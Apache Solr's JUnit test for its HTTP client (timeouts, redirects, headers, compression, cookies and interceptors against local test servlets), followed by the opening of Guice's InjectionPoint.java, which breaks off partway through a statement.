/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.client.solrj.impl; import jakarta.servlet.ServletException; import jakarta.servlet.http.HttpServlet; import jakarta.servlet.http.HttpServletRequest; import jakarta.servlet.http.HttpServletResponse; import java.io.IOException; import java.io.InputStream; import java.lang.invoke.MethodHandles; import java.net.URISyntaxException; import java.nio.charset.StandardCharsets; import java.util.Arrays; import java.util.Collection; import java.util.Collections; import java.util.Enumeration; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.TimeUnit; import java.util.stream.IntStream; import org.apache.http.Header; import org.apache.http.HttpEntity; import org.apache.http.HttpException; import org.apache.http.HttpRequest; import org.apache.http.HttpRequestInterceptor; import org.apache.http.HttpResponse; import org.apache.http.client.CookieStore; import org.apache.http.client.config.RequestConfig; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpRequestWrapper; import org.apache.http.client.protocol.HttpClientContext; import 
org.apache.http.client.utils.URIBuilder; import org.apache.http.cookie.CookieSpec; import org.apache.http.impl.client.BasicCookieStore; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.cookie.BasicClientCookie; import org.apache.http.protocol.HttpContext; import org.apache.solr.SolrJettyTestBase; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.client.api.util.SolrVersion; import org.apache.solr.client.solrj.SolrClient; import org.apache.solr.client.solrj.SolrQuery; import org.apache.solr.client.solrj.SolrRequest; import org.apache.solr.client.solrj.SolrRequest.METHOD; import org.apache.solr.client.solrj.SolrServerException; import org.apache.solr.client.solrj.request.QueryRequest; import org.apache.solr.client.solrj.request.UpdateRequest; import org.apache.solr.client.solrj.response.QueryResponse; import org.apache.solr.common.SolrException; import org.apache.solr.common.SolrException.ErrorCode; import org.apache.solr.common.SolrInputDocument; import org.apache.solr.common.params.CommonParams; import org.apache.solr.common.params.ModifiableSolrParams; import org.apache.solr.common.util.NamedList; import org.apache.solr.common.util.SuppressForbidden; import org.apache.solr.embedded.JettyConfig; import org.eclipse.jetty.ee10.servlet.ServletHolder; import org.junit.BeforeClass; import org.junit.Test; import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class BasicHttpSolrClientTest extends SolrJettyTestBase { private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass()); private static final String UA_VERSION = SolrVersion.LATEST_STRING; public static class RedirectServlet extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { resp.sendRedirect("/solr/collection1/select?" 
+ req.getQueryString()); } } public static class SlowServlet extends HttpServlet { @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { try { Thread.sleep(5000); } catch (InterruptedException ignored) { } } } public static class SlowStreamServlet extends HttpServlet { public static final int PACKET_MS = 500; @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException { String countStr = req.getParameter("count"); IntStream.range(0, countStr == null ? 10 : Integer.parseInt(countStr)) .forEach( i -> { try { Thread.sleep(PACKET_MS); resp.getOutputStream().write(String.valueOf(i).getBytes(StandardCharsets.UTF_8)); resp.getOutputStream().flush(); } catch (IOException | InterruptedException e) { throw new RuntimeException(e); } }); } } public static class DebugServlet extends HttpServlet { public static void clear() { lastMethod = null; headers = null; parameters = null; errorCode = null; queryString = null; cookies = null; } public static Integer errorCode = null; public static String lastMethod = null; public static HashMap<String, String> headers = null; public static Map<String, String[]> parameters = null; public static String queryString = null; public static jakarta.servlet.http.Cookie[] cookies = null; public static void setErrorCode(Integer code) { errorCode = code; } @Override protected void doDelete(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "delete"; recordRequest(req, resp); } @Override protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "get"; recordRequest(req, resp); } @Override protected void doHead(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "head"; recordRequest(req, resp); } private void setHeaders(HttpServletRequest req) { Enumeration<String> headerNames = 
req.getHeaderNames(); headers = new HashMap<>(); while (headerNames.hasMoreElements()) { final String name = headerNames.nextElement(); headers.put(name, req.getHeader(name)); } } @SuppressForbidden(reason = "fake servlet only") private void setParameters(HttpServletRequest req) { parameters = req.getParameterMap(); } private void setQueryString(HttpServletRequest req) { queryString = req.getQueryString(); } private void setCookies(HttpServletRequest req) { jakarta.servlet.http.Cookie[] ck = req.getCookies(); cookies = req.getCookies(); } @Override protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "post"; recordRequest(req, resp); } @Override protected void doPut(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { lastMethod = "put"; recordRequest(req, resp); } private void recordRequest(HttpServletRequest req, HttpServletResponse resp) { setHeaders(req); setParameters(req); setQueryString(req); setCookies(req); if (null != errorCode) { try { resp.sendError(errorCode); } catch (IOException e) { throw new RuntimeException("sendError IO fail in DebugServlet", e); } } } } @BeforeClass public static void beforeTest() throws Exception { JettyConfig jettyConfig = JettyConfig.builder() .withServlet(new ServletHolder(RedirectServlet.class), "/redirect/*") .withServlet(new ServletHolder(SlowServlet.class), "/slow/*") .withServlet(new ServletHolder(DebugServlet.class), "/debug/*") .withServlet(new ServletHolder(SlowStreamServlet.class), "/slowStream/*") .build(); createAndStartJetty(legacyExampleCollection1SolrHome(), jettyConfig); } @Test public void testTimeout() throws Exception { SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath("/slow/foo" + queryRequest.getPath()); try (SolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withConnectionTimeout(DEFAULT_CONNECTION_TIMEOUT, TimeUnit.MILLISECONDS) 
.withSocketTimeout(2000, TimeUnit.MILLISECONDS) .build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("Timeout")); } } /** * test that SolrExceptions thrown by HttpSolrClient can correctly encapsulate http status codes * even when not on the list of ErrorCodes solr may return. */ public void testSolrExceptionCodeNotFromSolr() throws IOException, SolrServerException { final int status = 527; assertEquals( status + " didn't generate an UNKNOWN error code, someone modified the list of valid ErrorCode's w/o changing this test to work a different way", ErrorCode.UNKNOWN, ErrorCode.getErrorCode(status)); try (SolrClient client = getHttpSolrClient(getBaseUrl())) { DebugServlet.setErrorCode(status); SolrQuery q = new SolrQuery("foo"); final var queryRequest = new QueryRequest(q); queryRequest.setPath("/debug/foo" + queryRequest.getPath()); SolrException e = expectThrows(SolrException.class, () -> queryRequest.process(client)); assertEquals("Unexpected exception status code", status, e.code()); } finally { DebugServlet.clear(); } } @Test public void testQuery() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; SolrQuery q = new SolrQuery("foo"); q.setParam("a", "\u1234"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath); try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); // default method assertEquals("get", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, 
DebugServlet.headers.get("User-Agent")); // keepalive assertEquals("keep-alive", DebugServlet.headers.get("Connection")); // content-type assertNull(DebugServlet.headers.get("Content-Type")); // param encoding assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); // POST DebugServlet.clear(); queryRequest.setMethod(METHOD.POST); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); // PUT DebugServlet.clear(); queryRequest.setMethod(METHOD.PUT); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("put", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( 
"application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); } // XML try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withResponseParser(new XMLResponseParser()) .build()) { // XML/GET DebugServlet.clear(); queryRequest.setMethod(METHOD.GET); // Reset to the default here after using 'PUT' above expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("get", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); // XML/POST DebugServlet.clear(); queryRequest.setMethod(METHOD.POST); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); DebugServlet.clear(); queryRequest.setMethod(METHOD.PUT); 
expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertEquals("put", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); assertEquals( "application/x-www-form-urlencoded; charset=UTF-8", DebugServlet.headers.get("Content-Type")); } } @Test public void testDelete() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { final UpdateRequest deleteById = new UpdateRequest(); deleteById.deleteById("id"); deleteById.setPath(debugPath + deleteById.getPath()); expectThrows(SolrClient.RemoteSolrException.class, () -> deleteById.process(client)); // default method assertEquals("post", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // keepalive assertEquals("keep-alive", DebugServlet.headers.get("Connection")); } // XML try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withResponseParser(new XMLResponseParser()) .build()) { final var deleteByQueryRequest = new UpdateRequest(); deleteByQueryRequest.setPath(debugPath + 
deleteByQueryRequest.getPath()); deleteByQueryRequest.deleteByQuery("*:*"); deleteByQueryRequest.setCommitWithin(-1); expectThrows( SolrClient.RemoteSolrException.class, () -> deleteByQueryRequest.process(client)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals("keep-alive", DebugServlet.headers.get("Connection")); } } @Test public void testGetById() throws Exception { DebugServlet.clear(); try (SolrClient client = getHttpSolrClient(getBaseUrl() + "/debug/foo")) { Collection<String> ids = Collections.singletonList("a"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("a")); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById(ids, null)); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("foo", "a")); expectThrows(SolrClient.RemoteSolrException.class, () -> client.getById("foo", ids, null)); } } @Test public void testUpdate() throws Exception { DebugServlet.clear(); final String debugPath = "/debug/foo"; try (HttpSolrClient client = getHttpSolrClient(getBaseUrl())) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> req.process(client)); // default method assertEquals("post", DebugServlet.lastMethod); // agent assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); // default wt assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", 
DebugServlet.parameters.get(CommonParams.WT)[0]); // content type assertEquals("application/javabin", DebugServlet.headers.get("Content-Type")); // parameter encoding assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } DebugServlet.clear(); // XML response and writer try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withRequestWriter(new XMLRequestWriter()) .withResponseParser(new XMLResponseParser()) .build()) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("xml", DebugServlet.parameters.get(CommonParams.WT)[0]); assertEquals("application/xml; charset=UTF-8", DebugServlet.headers.get("Content-Type")); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } DebugServlet.clear(); // javabin request try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()) .withRequestWriter(new JavaBinRequestWriter()) .withResponseParser(new JavaBinResponseParser()) .build()) { UpdateRequest req = new UpdateRequest(); req.add(new SolrInputDocument()); req.setPath(debugPath + req.getPath()); req.setParam("a", "\u1234"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); assertEquals("post", DebugServlet.lastMethod); assertEquals( "Solr[" + HttpSolrClient.class.getName() + "] " + UA_VERSION, DebugServlet.headers.get("User-Agent")); assertEquals(1, DebugServlet.parameters.get(CommonParams.WT).length); assertEquals("javabin", DebugServlet.parameters.get(CommonParams.WT)[0]); 
assertEquals("application/javabin", DebugServlet.headers.get("Content-Type")); assertEquals(1, DebugServlet.parameters.get("a").length); assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); } } @Test public void testRedirect() throws Exception { final String redirectPath = "/redirect/foo"; SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(redirectPath + queryRequest.getPath()); // default for redirect is false. try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("redirect")); } try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).withFollowRedirects(true).build()) { // No exception expected queryRequest.process(client); } // And with explicit false: try (HttpSolrClient client = new HttpSolrClient.Builder(getBaseUrl()).withFollowRedirects(false).build()) { SolrServerException e = expectThrows(SolrServerException.class, () -> queryRequest.process(client)); assertTrue(e.getMessage().contains("redirect")); } } @Test public void testCompression() throws Exception { final String debugPath = "/debug/foo"; final SolrQuery q = new SolrQuery("*:*"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath + queryRequest.getPath()); try (SolrClient client = getHttpSolrClient(getBaseUrl())) { // verify request header gets set DebugServlet.clear(); expectThrows(SolrClient.RemoteSolrException.class, () -> queryRequest.process(client)); assertNull(DebugServlet.headers.toString(), DebugServlet.headers.get("Accept-Encoding")); } try (SolrClient client = new HttpSolrClient.Builder(getBaseUrl()).allowCompression(true).build()) { try { queryRequest.process(client); } catch (SolrClient.RemoteSolrException ignored) { } assertNotNull(DebugServlet.headers.get("Accept-Encoding")); } try (SolrClient client = new 
HttpSolrClient.Builder(getBaseUrl()).allowCompression(false).build()) { try { queryRequest.process(client); } catch (SolrClient.RemoteSolrException ignored) { } } assertNull(DebugServlet.headers.get("Accept-Encoding")); // verify server compresses output HttpGet get = new HttpGet(getCoreUrl() + "/select?q=foo&wt=xml"); get.setHeader("Accept-Encoding", "gzip"); ModifiableSolrParams params = new ModifiableSolrParams(); params.set(HttpClientUtil.PROP_ALLOW_COMPRESSION, true); RequestConfig config = RequestConfig.custom().setDecompressionEnabled(false).build(); get.setConfig(config); CloseableHttpClient httpclient = HttpClientUtil.createClient(params); HttpEntity entity = null; try { HttpResponse response = httpclient.execute(get, HttpClientUtil.createNewHttpClientRequestContext()); entity = response.getEntity(); Header ceheader = entity.getContentEncoding(); assertNotNull(Arrays.asList(response.getAllHeaders()).toString(), ceheader); assertEquals("gzip", ceheader.getValue()); } finally { if (entity != null) { entity.getContent().close(); } HttpClientUtil.close(httpclient); } // verify compressed response can be handled try (SolrClient client = getHttpSolrClient(getBaseUrl(), DEFAULT_TEST_COLLECTION_NAME)) { QueryResponse response = client.query(new SolrQuery("foo")); assertEquals(0, response.getStatus()); } } @Test public void testCollectionParameters() throws IOException, SolrServerException { try (SolrClient client = getHttpSolrClient(getBaseUrl())) { SolrInputDocument doc = new SolrInputDocument(); doc.addField("id", "collection"); client.add("collection1", doc); client.commit("collection1"); assertEquals( 1, client.query("collection1", new SolrQuery("id:collection")).getResults().getNumFound()); } try (SolrClient client = getHttpSolrClient(getBaseUrl(), DEFAULT_TEST_CORENAME)) { assertEquals(1, client.query(new SolrQuery("id:collection")).getResults().getNumFound()); } } @Test public void testGetRawStream() throws SolrServerException, IOException { 
CloseableHttpClient httpClient = HttpClientUtil.createClient(null); try (SolrClient solrClient = new HttpSolrClient.Builder(getBaseUrl()) .withDefaultCollection(DEFAULT_TEST_CORENAME) .withHttpClient(httpClient) .withResponseParser(null) .build(); ) { QueryRequest req = new QueryRequest(); NamedList<?> response = solrClient.request(req); InputStream stream = (InputStream) response.get("stream"); assertNotNull(stream); stream.close(); } finally { HttpClientUtil.close(httpClient); } } /** An interceptor changing the request */ HttpRequestInterceptor changeRequestInterceptor = new HttpRequestInterceptor() { @Override public void process(HttpRequest request, HttpContext context) throws HttpException, IOException { log.info("Intercepted params: {}", context); HttpRequestWrapper wrapper = (HttpRequestWrapper) request; URIBuilder uribuilder = new URIBuilder(wrapper.getURI()); uribuilder.addParameter("b", "\u4321"); try { wrapper.setURI(uribuilder.build()); } catch (URISyntaxException ex) { throw new HttpException("Invalid request URI", ex); } } }; public static final String cookieName = "cookieName"; public static final String cookieValue = "cookieValue"; /** An interceptor setting a cookie */ HttpRequestInterceptor cookieSettingRequestInterceptor = new HttpRequestInterceptor() { @Override public void process(HttpRequest request, HttpContext context) throws HttpException, IOException { BasicClientCookie cookie = new BasicClientCookie(cookieName, cookieValue); cookie.setVersion(0); cookie.setPath("/"); cookie.setDomain(getJetty().getBaseUrl().getHost()); CookieStore cookieStore = new BasicCookieStore(); CookieSpec cookieSpec = new SolrPortAwareCookieSpecFactory().create(context); // CookieSpec cookieSpec = registry.lookup(policy).create(context); // Add the cookies to the request List<Header> headers = cookieSpec.formatCookies(Collections.singletonList(cookie)); for (Header header : headers) { request.addHeader(header); } 
context.setAttribute(HttpClientContext.COOKIE_STORE, cookieStore); } }; /** * Set cookies via interceptor Change the request via an interceptor Ensure cookies are actually * set and that request is actually changed */ @Test public void testInterceptors() { DebugServlet.clear(); HttpClientUtil.addRequestInterceptor(changeRequestInterceptor); HttpClientUtil.addRequestInterceptor(cookieSettingRequestInterceptor); final String debugPath = "/debug/foo"; try (SolrClient server = getHttpSolrClient(getBaseUrl())) { SolrQuery q = new SolrQuery("foo"); q.setParam("a", "\u1234"); final var queryRequest = new QueryRequest(q); queryRequest.setPath(debugPath + queryRequest.getPath()); expectThrows( Exception.class, () -> { queryRequest.setMethod(random().nextBoolean() ? METHOD.POST : METHOD.GET); queryRequest.process(server); }); // Assert cookies from UseContextCallback assertNotNull(DebugServlet.cookies); boolean foundCookie = false; for (jakarta.servlet.http.Cookie cookie : DebugServlet.cookies) { if (cookieName.equals(cookie.getName()) && cookieValue.equals(cookie.getValue())) { foundCookie = true; break; } } assertTrue(foundCookie); // Assert request changes by ChangeRequestCallback assertEquals("\u1234", DebugServlet.parameters.get("a")[0]); assertEquals("\u4321", DebugServlet.parameters.get("b")[0]); } catch (IOException ex) { throw new RuntimeException(ex); } finally { HttpClientUtil.removeRequestInterceptor(changeRequestInterceptor); HttpClientUtil.removeRequestInterceptor(cookieSettingRequestInterceptor); } } private void setReqParamsOf(UpdateRequest req, String... 
keys) { if (keys != null) { for (String k : keys) { req.setParam(k, k + "Value"); } } } private void verifyServletState(HttpSolrClient client, SolrRequest<?> request) { // check query String Iterator<String> paramNames = request.getParams().getParameterNamesIterator(); while (paramNames.hasNext()) { String name = paramNames.next(); String[] values = request.getParams().getParams(name); if (values != null) { for (String value : values) { boolean shouldBeInQueryString = client.getUrlParamNames().contains(name) || (request.getQueryParams() != null && request.getQueryParams().contains(name)); assertEquals( shouldBeInQueryString, DebugServlet.queryString.contains(name + "=" + value)); // in either case, it should be in the parameters assertNotNull(DebugServlet.parameters.get(name)); assertEquals(1, DebugServlet.parameters.get(name).length); assertEquals(value, DebugServlet.parameters.get(name)[0]); } } } } @Test public void testQueryString() throws Exception { final String debugPath = "/debug/foo"; HttpSolrClient.Builder builder = new HttpSolrClient.Builder(getBaseUrl()); try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of("serverOnly")).build()) { // test without request query params DebugServlet.clear(); UpdateRequest req = new UpdateRequest(); req.setPath(debugPath + req.getPath()); setReqParamsOf(req, "serverOnly", "notServer"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req)); verifyServletState(client, req); } try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of()).build()) { // test without server query params DebugServlet.clear(); UpdateRequest req2 = new UpdateRequest(); req2.setPath(debugPath + req2.getPath()); req2.setQueryParams(Set.of("requestOnly")); setReqParamsOf(req2, "requestOnly", "notRequest"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req2)); verifyServletState(client, req2); } try (HttpSolrClient client = 
builder.withTheseParamNamesInTheUrl(Set.of("serverOnly", "both")).build()) { // test with both request and server query params DebugServlet.clear(); UpdateRequest req3 = new UpdateRequest(); req3.setPath(debugPath + req3.getPath()); req3.setQueryParams(Set.of("requestOnly", "both")); setReqParamsOf(req3, "serverOnly", "requestOnly", "both", "neither"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req3)); verifyServletState(client, req3); } try (HttpSolrClient client = builder.withTheseParamNamesInTheUrl(Set.of("serverOnly", "both")).build()) { // test with both request and server query params with single stream DebugServlet.clear(); UpdateRequest req4 = new UpdateRequest(); req4.setPath(debugPath + req4.getPath()); req4.add(new SolrInputDocument()); req4.setQueryParams(Set.of("requestOnly", "both")); setReqParamsOf(req4, "serverOnly", "requestOnly", "both", "neither"); expectThrows(SolrClient.RemoteSolrException.class, () -> client.request(req4)); // NOTE: single stream requests send all the params // as part of the query string. So add "neither" to the request, // so it passes the verification step. req4.setQueryParams(Set.of("requestOnly", "both", "neither")); verifyServletState(client, req4); } } @Test @SuppressWarnings({"try"}) public void testInvariantParams() throws IOException { try (HttpSolrClient createdClient = new HttpSolrClient.Builder() .withBaseSolrUrl(getBaseUrl()) .withInvariantParams(SolrTestCaseJ4.params("param", "value")) .build()) { assertEquals("value", createdClient.getInvariantParams().get("param")); } try (HttpSolrClient createdClient = new HttpSolrClient.Builder() .withBaseSolrUrl(getBaseUrl()) .withInvariantParams(SolrTestCaseJ4.params("fq", "fq1", "fq", "fq2")) .build()) { assertEquals(2, createdClient.getInvariantParams().getParams("fq").length); } } }
google/guice
36,058
core/src/com/google/inject/spi/InjectionPoint.java
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.spi; import static com.google.inject.internal.MoreTypes.getRawType; import com.google.common.collect.ImmutableList; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Iterables; import com.google.common.collect.Lists; import com.google.common.collect.ObjectArrays; import com.google.inject.ConfigurationException; import com.google.inject.Inject; import com.google.inject.Key; import com.google.inject.TypeLiteral; import com.google.inject.internal.Annotations; import com.google.inject.internal.DeclaredMembers; import com.google.inject.internal.Errors; import com.google.inject.internal.ErrorsException; import com.google.inject.internal.KotlinSupport; import com.google.inject.internal.Nullability; import com.google.inject.internal.util.Classes; import java.lang.annotation.Annotation; import java.lang.reflect.AnnotatedElement; import java.lang.reflect.AnnotatedType; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Member; import java.lang.reflect.Method; import java.lang.reflect.Modifier; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import java.util.logging.Logger; import 
java.util.stream.Collectors; /** * A constructor, field or method that can receive injections. Typically this is a member with the * {@literal @}{@link Inject} annotation. For non-private, no argument constructors, the member may * omit the annotation. * * @author crazybob@google.com (Bob Lee) * @since 2.0 */ public final class InjectionPoint { private static final Logger logger = Logger.getLogger(InjectionPoint.class.getName()); private final boolean optional; private final Member member; private final TypeLiteral<?> declaringType; private final ImmutableList<Dependency<?>> dependencies; InjectionPoint(TypeLiteral<?> declaringType, Method method, boolean optional) { this.member = method; this.declaringType = declaringType; this.optional = optional; this.dependencies = forMember( new Errors(method), method, declaringType, method.getAnnotatedParameterTypes(), method.getParameterAnnotations(), KotlinSupport.getInstance().getIsParameterKotlinNullablePredicate(method)); } InjectionPoint(TypeLiteral<?> declaringType, Constructor<?> constructor) { this.member = constructor; this.declaringType = declaringType; this.optional = false; Errors errors = new Errors(constructor); KotlinSupport.getInstance().checkConstructorParameterAnnotations(constructor, errors); this.dependencies = forMember( errors, constructor, declaringType, constructor.getAnnotatedParameterTypes(), constructor.getParameterAnnotations(), KotlinSupport.getInstance().getIsParameterKotlinNullablePredicate(constructor)); } InjectionPoint(TypeLiteral<?> declaringType, Field field, boolean optional) { this.member = field; this.declaringType = declaringType; this.optional = optional; Annotation[] annotations = getAnnotations(field); Annotation[] typeUseAnnotations = field.getAnnotatedType().getAnnotations(); Errors errors = new Errors(field); Key<?> key = null; try { key = Annotations.getKey(declaringType.getFieldType(field), field, annotations, errors); } catch (ConfigurationException e) { 
errors.merge(e.getErrorMessages());
    } catch (ErrorsException e) {
      errors.merge(e.getErrors());
    }
    errors.throwConfigurationExceptionIfErrorsExist();
    // The field may receive null if any of the three nullability sources allows it:
    // annotations on the member itself, type-use annotations, or Kotlin nullability metadata.
    boolean allowsNull =
        Nullability.hasNullableAnnotation(annotations)
